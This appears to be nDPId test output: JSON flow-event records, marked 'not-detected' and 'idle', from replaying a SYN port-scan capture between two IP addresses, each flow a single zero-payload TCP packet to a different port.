-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":454,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059096,"flow_last_seen":1278275059096,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":25734,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":454,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059096,"flow_last_seen":1278275059096,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":25734,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1686,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061001,"flow_last_seen":1278275061001,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":25735,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1686,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061001,"flow_last_seen":1278275061001,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":25735,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":494,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059220,"flow_last_seen":1278275059220,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":25734,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":494,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059220,"flow_last_seen":1278275059220,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":25734,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1771,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061104,"flow_last_seen":1278275061104,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":25735,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1771,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061104,"flow_last_seen":1278275061104,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":25735,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1673,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060951,"flow_last_seen":1278275060951,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3211,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1673,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060951,"flow_last_seen":1278275060951,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3211,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1246,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1163,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1246,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1163,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1754,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061055,"flow_last_seen":1278275061055,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3211,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1754,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061055,"flow_last_seen":1278275061055,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3211,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1314,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060490,"flow_last_seen":1278275060490,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1163,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1314,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060490,"flow_last_seen":1278275060490,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1163,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":882,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059851,"flow_last_seen":1278275059851,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1164,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":882,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059851,"flow_last_seen":1278275059851,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1164,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":973,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059962,"flow_last_seen":1278275059962,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1164,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":973,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059962,"flow_last_seen":1278275059962,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1164,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":737,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059631,"flow_last_seen":1278275059631,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1165,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":737,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059631,"flow_last_seen":1278275059631,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1165,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":818,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059742,"flow_last_seen":1278275059742,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1165,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":818,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059742,"flow_last_seen":1278275059742,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1165,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":373,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058845,"flow_last_seen":1278275058845,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1166,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":373,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058845,"flow_last_seen":1278275058845,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1166,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":411,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058970,"flow_last_seen":1278275058970,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1166,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":411,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058970,"flow_last_seen":1278275058970,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1166,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":251,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058471,"flow_last_seen":1278275058471,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":44176,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":251,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058471,"flow_last_seen":1278275058471,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":44176,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":174,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058221,"flow_last_seen":1278275058221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":13456,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":174,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058221,"flow_last_seen":1278275058221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":13456,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":287,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058595,"flow_last_seen":1278275058595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":44176,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":287,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058595,"flow_last_seen":1278275058595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":44176,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":547,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059346,"flow_last_seen":1278275059346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1169,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":547,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059346,"flow_last_seen":1278275059346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1169,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":200,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058345,"flow_last_seen":1278275058345,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":13456,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":200,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058345,"flow_last_seen":1278275058345,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":13456,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":600,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059455,"flow_last_seen":1278275059455,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1169,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":600,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059455,"flow_last_seen":1278275059455,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1169,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1946,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061313,"flow_last_seen":1278275061313,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5269,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1946,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061313,"flow_last_seen":1278275061313,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5269,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1366,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060541,"flow_last_seen":1278275060541,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3221,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1366,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060541,"flow_last_seen":1278275060541,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3221,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1976,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5269,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1976,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5269,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1428,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060641,"flow_last_seen":1278275060641,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3221,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 